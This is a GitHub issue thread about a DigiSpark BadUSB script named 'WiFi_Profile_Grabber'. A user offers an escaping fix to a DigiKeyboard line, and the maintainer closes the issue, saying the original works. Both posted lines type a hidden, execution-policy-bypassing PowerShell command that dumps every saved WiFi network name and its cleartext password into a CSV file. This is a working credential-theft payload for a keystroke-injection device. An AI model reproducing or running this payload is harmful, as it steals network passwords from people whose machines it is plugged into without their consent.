### ISSUE TITLE
WiFi_Profile_Grabber issue with path

### ISSUE THREAD

**Issue by suhas4090** [CedArctic/DigiSpark-Scripts#5]
This doesnt work:

DigiKeyboard.print(F("powershell -NoP -NonI -W Hidden -Exec Bypass \"(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv temp.csv\" "));

replace with this:
DigiKeyboard.print(F("powershell -NoP -NonI -W Hidden -Exec Bypass \"(netsh wlan show profiles) | Select-String '\\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv temp.csv\""));

**Comment by CedArctic** [comment]
@suhas4090 thanks for working on the script, though I just tested it on a couple of machines and they both work fine with the way the script is written. I don't know why it didn't work for you from the beginning but I'm glad that your modification works for you. I'm closing this issue since everything seems to be alright with the initial version.
